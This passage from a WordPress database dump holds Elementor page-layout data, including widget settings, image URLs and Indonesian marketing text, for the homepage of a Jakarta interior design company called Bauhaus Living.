\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4180,4914,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4181,4914,'_elementor_pro_version','3.8.1'),(4182,4915,'_wp_page_template','elementor_header_footer'),(4183,4915,'_elementor_edit_mode','builder'),(4184,4915,'_elementor_template_type','wp-page'),(4185,4915,'_elementor_version','3.8.1'),(4186,4915,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new 